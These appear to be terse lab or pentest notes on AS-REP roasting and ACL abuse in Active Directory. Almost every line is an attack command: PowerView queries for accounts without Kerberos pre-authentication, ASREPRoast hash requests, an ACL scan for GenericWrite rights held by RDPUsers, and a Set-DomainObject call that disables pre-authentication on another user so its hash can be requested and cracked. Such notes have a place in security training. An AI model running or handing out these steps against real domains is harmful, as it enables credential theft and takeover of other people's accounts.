Enum Users With Kerberos Pre Auth Disabled

. .\\PowerView_dev.ps1

Get-DomainUser -PreauthNotRequired

Request Hash

. C:\\AD\\Tools\\ASREPRoast-master\\ASREPRoast-master\\ASREPRoast.ps1

Get-ASREPHash -UserName VPN648user 

Enum Users Who Has GenericWrite/All R

ight

. .\\PowerView_dev.ps1

Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

Force Set Preauth Not Required

Set-DomainObject -Identity Control648User -XOR @{useraccountcontrol=4194304} -Verbose

Get-DomainUser -PreauthNotRequired -Identity Control648User

Request Ticket

Get-ASREPHash -UserName Control648User -Verbose

We can crack this ticket too.

Abusing Active Directory ACLs/ACEs

AS-REP Roasting

Abusing Active Directory ACLs/ACEs